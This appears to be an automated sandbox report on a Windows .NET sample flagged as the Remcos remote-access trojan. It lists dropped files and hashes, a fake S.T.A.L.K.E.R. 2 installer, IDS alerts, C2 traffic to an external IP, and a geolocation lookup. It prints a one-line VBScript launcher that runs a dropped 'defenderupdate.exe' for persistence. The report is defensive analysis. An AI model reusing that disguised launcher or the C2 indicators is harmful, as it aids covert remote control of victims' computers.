                                                                                              Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):10504
                                                                                              Entropy (8bit):4.805759157282851
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:SA7/eCA1eDv1m1T1mH1moT1m71m9HfVpKtOo2tbgV:Z/FUSfNjaV
                                                                                              MD5:17D357039C9FE11941E65A6AF15BC2DB
                                                                                              SHA1:5FEEE54F5C41B75D6BA98EDE7968987D62771B67
                                                                                              SHA-256:04C5BDC467A5BD1EE9F3189E281B48AABBBC8D0DCD0B5AF93A29EDB0CEBBE1C7
                                                                                              SHA-512:0E2FFCCDF3265526FA6ACBC8DAB7FDA65A3CD71E827A0DF7C2549B06C9748CBE33F59917C4F45F41D29F26B02C77276A31FE5B8162ABF69D8DB33D6459DCC0AB
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:.2024-11-24 22:47:28.818 Log opened. (Time zone: UTC-05:00)..2024-11-24 22:47:28.818 Setup version: Inno Setup version 5.6.1 (u)..2024-11-24 22:47:28.818 Original Setup EXE: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe..2024-11-24 22:47:28.818 Setup command line: /SL5="$1000C6,192512,0,C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe" ..2024-11-24 22:47:28.818 Windows version: 10.0.19045 (NT platform: Yes)..2024-11-24 22:47:28.818 64-bit Windows: Yes..2024-11-24 22:47:28.818 Processor architecture: x64..2024-11-24 22:47:28.818 User privileges: Administrative..2024-11-24 22:47:29.083 64-bit install mode: No..2024-11-24 22:47:32.599 Created temporary directory: C:\Users\user\AppData\Local\Temp\is-MG2J6.tmp..2024-11-24 22:47:32.614 -- DLL function import --..2024-11-24 22:47:32.614 Function name: GetDriveTypeW..2024-11-24 22:47:32.614 DLL name: kernel32.dll..2024-11-24 2
                                                                                              Process:C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1335808
                                                                                              Entropy (8bit):6.626175390113613
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:HgNfn7OOXeL7dJ/oOP9pjA0fY2Mqz9JT7ytfsxjHElkLD229Oqkipt1NCnqxjVV:AtTX6THjACMq/xCaaMksgi7
                                                                                              MD5:FF5EBF66CDDD9913B729DE78EEB638C8
                                                                                              SHA1:CA23D5639D1C516E3DEFC8F5B267BB5C040238D5
                                                                                              SHA-256:ABF8D4D522CA94A179D644EC0464474B580EC82441B118B663DA3BD879F91D85
                                                                                              SHA-512:4FA3A2DC8AD68BFFFC0E039171D2DA71C3C37EADE709D5495E825BB53F576180EAFEE57E3C1F78D7DCC8D26E26CC24E1E99BB494D9B4A55F74F4145EB6E5A05B
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...M.z[.................V...........f.......p....@.......................... ............@......@..............................@8......D....................p...............................`.......................................................text...|<.......>.................. ..`.itext.......P.......B.............. ..`.data..../...p...0...Z..............@....bss.....a...............................idata..@8.......:..................@....tls....<....P...........................rdata.......`......................@..@.reloc.......p......................@..B.rsrc...D...........................@..@............. .......d..............@..@................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp
                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):6144
                                                                                              Entropy (8bit):4.720366600008286
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                              Joe Sandbox View:
                                                                                              • Filename: 2024.1.16.exe, Detection: malicious, Browse
                                                                                              • Filename: 2024.1.16.exe, Detection: malicious, Browse
                                                                                              • Filename: veraport-g3-x64.exe, Detection: malicious, Browse
                                                                                              • Filename: ChromeSetup.exe, Detection: malicious, Browse
                                                                                              • Filename: ChromeSetup.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: Y7Zv23yKfb.exe, Detection: malicious, Browse
                                                                                              • Filename: Y7Zv23yKfb.exe, Detection: malicious, Browse
                                                                                              • Filename: cho_mea64.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2849736
                                                                                              Entropy (8bit):6.9619664618602135
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:iigPg3mBjR9EvCHl/RX7JQ221GtsCFonRHmb+G4O60X8Bug+Hmjv4gB:cgWBjj+2l/RX1QtUFFonR4+tO6Rug+G/
                                                                                              MD5:719E5D10DAFEDD2EFC8FD7A446AB7C2F
                                                                                              SHA1:5F9CDE6382D023EEE636719AEE4F6F18FC8F1E49
                                                                                              SHA-256:F3176C204871908753CCD551407CA451AFD87351F87C53998E87BD77B2E39831
                                                                                              SHA-512:7368FE86797E3AC03E9CD20F4542EA48330DA9B89401DDE63F304B86B819AE0842EDA327A4752671EF3FB3284FFACE2B2B412B6ED772BEDD561711453B04C090
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....L/\............................\........ ....@..................................+...@......@...................................................Z+.H!...........................................................................................text............................... ..`.itext.............................. ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................,...................rdata...............,..............@..@.reloc..............................@..B.rsrc................B..............@..@....................................@..@................................................................................................
                                                                                              Process:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):89
                                                                                              Entropy (8bit):4.699181364242189
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:FER/n0eFHHot+kiEaKC5JtNJHHn:FER/lFHIwknaZ5vn
                                                                                              MD5:A429E2AA7E299EBCB8DE3E1520E2FEC8
                                                                                              SHA1:1E0D0B49B38E997A4B6366749415118016C68065
                                                                                              SHA-256:142EE5E243E33F8A7B0CBAAB6637F89DDA18191A6DE73CB6623846F7D11BFB85
                                                                                              SHA-512:01528A30FEEE1D4BF55CC9218191BADC50F627497AC7E00AF83172F4B0E46467925CB394F1529F0C8B73557F9BDF4050E44ED8B708599DB3316398DCC8E016CC
                                                                                              Malicious:true
                                                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\defenderupdate.exe"""
                                                                                              Process:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3410432
                                                                                              Entropy (8bit):7.998628590725982
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:cBwJhUhNLguhinxeDZf2g5rskMP2/9SKgY/dyXMTBqtr7hDMukLdpHx5vnvaluNn:DJK5linxmf3rsN2/gXY0UZpRlyxwxx
                                                                                              MD5:12F35A41245C2DBB16D0574D9DCC59C9
                                                                                              SHA1:4D192C491EB0F4CF477B008EC2B0798940915EE0
                                                                                              SHA-256:9FAB1939599469D96091A078E0ED884ED100CFCA13FA89F2E48E9937F0E1535C
                                                                                              SHA-512:FC66A9C862C5CF2F7AD2436D31476E255445CEDD05C906C0F1FDB85DE52ECE8AA931B1CECFA0990BD5DC7D4937B4F2B8442E9BF7F216D03E48A7F3500A6C4046
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W.@g..................2..:........2.. ........@.. .......................`4...........`...................................2.K.....3..8...................@4...................................................... ............... ..H............text...4.2.. ....2................. ..`.rsrc....8....3..8....2.............@..@.reloc.......@4.......4.............@..B..................2.....H.........2.P+...........r...N2..........................................0..........(....*.*.s....(....*.0..e........(....(.....+M.o....~....%-.&~..........s....%.....(...+...(....-.. k]..(.... .......o....&..(....-.*....0..[..........(.....s...... .]..(....(....o..... .]..(....(....o.....o........io........,..o.....&..*.........=L..........SV........(....*.s.........*..(....*Z.o.... a]..(....o....*.~....-# .]..(.........(....o....s.........~....*.~....*.......*~(.... .]..(.
                                                                                              Process:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.998628590725982
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:eBHn6qHPLz.exe
                                                                                              File size:3'410'432 bytes
                                                                                              MD5:12f35a41245c2dbb16d0574d9dcc59c9
                                                                                              SHA1:4d192c491eb0f4cf477b008ec2b0798940915ee0
                                                                                              SHA256:9fab1939599469d96091a078e0ed884ed100cfca13fa89f2e48e9937f0e1535c
                                                                                              SHA512:fc66a9c862c5cf2f7ad2436d31476e255445cedd05c906c0f1fdb85de52ece8aa931b1cecfa0990bd5dc7d4937b4f2b8442e9bf7f216d03e48a7f3500a6c4046
                                                                                              SSDEEP:49152:cBwJhUhNLguhinxeDZf2g5rskMP2/9SKgY/dyXMTBqtr7hDMukLdpHx5vnvaluNn:DJK5linxmf3rsN2/gXY0UZpRlyxwxx
                                                                                              TLSH:83F53305B4DEE7CDCB3C36724FD2A2A0EE21D766E1A3F65BBC03D55239192A061E650C
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W.@g..................2..:........2.. ........@.. .......................`4...........`................................
                                                                                              Icon Hash:0f6decece879218f
                                                                                              Entrypoint:0x72ed2e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x6740DB57 [Fri Nov 22 19:28:23 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x32ece00x4b.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3300000x13800.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3440000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x32cd340x32ce006055d72f83513443876b0e3de12a13a2unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x3300000x138000x13800154e89df516d84d9c76e771575370abdFalse0.9894706530448718data7.976621047292781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x3440000xc0x2001f504dd4cf79ac58f854689feb21bc29False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x3301300x13164PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0001023279611154
                                                                                              RT_GROUP_ICON0x3432940x14Targa image data - Map 32 x 12644 x 1 +11.05
                                                                                              RT_VERSION0x3432a80x31cdata0.4321608040201005
                                                                                              RT_MANIFEST0x3435c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-11-25T04:47:30.242289+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.4497325.181.159.1531151TCP
                                                                                              2024-11-25T04:47:31.620496+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response15.181.159.1531151192.168.2.449732TCP
                                                                                              2024-11-25T04:47:33.808078+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449735178.237.33.5080TCP
                                                                                              2024-11-25T04:49:38.820509+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response15.181.159.1531151192.168.2.449732TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 25, 2024 04:47:30.121393919 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:30.241046906 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:30.241158962 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:30.242289066 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:30.361803055 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:31.620496035 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:31.645920038 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:31.765646935 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:31.873850107 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:31.932441950 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:32.376956940 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:47:32.496587992 CET8049735178.237.33.50192.168.2.4
                                                                                              Nov 25, 2024 04:47:32.496681929 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:47:32.497009993 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:47:32.616460085 CET8049735178.237.33.50192.168.2.4
                                                                                              Nov 25, 2024 04:47:33.807995081 CET8049735178.237.33.50192.168.2.4
                                                                                              Nov 25, 2024 04:47:33.808078051 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:47:33.842701912 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:33.962266922 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:34.807444096 CET8049735178.237.33.50192.168.2.4
                                                                                              Nov 25, 2024 04:47:34.809402943 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:47:38.776357889 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:47:38.777815104 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:47:38.897443056 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:48:08.810467005 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:48:08.828860044 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:48:08.948451996 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:48:38.807697058 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:48:38.809003115 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:48:38.928546906 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:49:08.821856976 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:49:08.823339939 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:49:08.942918062 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:49:22.108815908 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:49:22.420831919 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:49:23.030155897 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:49:24.233237028 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:49:26.639471054 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:49:31.452028990 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:49:38.820508957 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:49:38.834645987 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:49:38.954216003 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:49:41.061428070 CET4973580192.168.2.4178.237.33.50
                                                                                              Nov 25, 2024 04:50:08.837784052 CET1151497325.181.159.153192.168.2.4
                                                                                              Nov 25, 2024 04:50:08.839303017 CET497321151192.168.2.45.181.159.153
                                                                                              Nov 25, 2024 04:50:08.958905935 CET1151497325.181.159.153192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 25, 2024 04:47:32.135674000 CET5475353192.168.2.41.1.1.1
                                                                                              Nov 25, 2024 04:47:32.368493080 CET53547531.1.1.1192.168.2.4
                                                                                              Nov 25, 2024 04:47:44.969841957 CET5594853192.168.2.41.1.1.1
                                                                                              Nov 25, 2024 04:47:45.110855103 CET53559481.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Nov 25, 2024 04:47:32.135674000 CET192.168.2.41.1.1.10xb0a2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                              Nov 25, 2024 04:47:44.969841957 CET192.168.2.41.1.1.10xec26Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Nov 25, 2024 04:47:32.368493080 CET1.1.1.1192.168.2.40xb0a2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                              Nov 25, 2024 04:47:45.110855103 CET1.1.1.1192.168.2.40xec26No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                              • geoplugin.net
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449735178.237.33.50807612C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Nov 25, 2024 04:47:32.497009993 CET71OUTGET /json.gp HTTP/1.1
                                                                                              Host: geoplugin.net
                                                                                              Cache-Control: no-cache
                                                                                              Nov 25, 2024 04:47:33.807995081 CET1170INHTTP/1.1 200 OK
                                                                                              date: Mon, 25 Nov 2024 03:47:33 GMT
                                                                                              server: Apache
                                                                                              content-length: 962
                                                                                              content-type: application/json; charset=utf-8
                                                                                              cache-control: public, max-age=300
                                                                                              access-control-allow-origin: *
                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


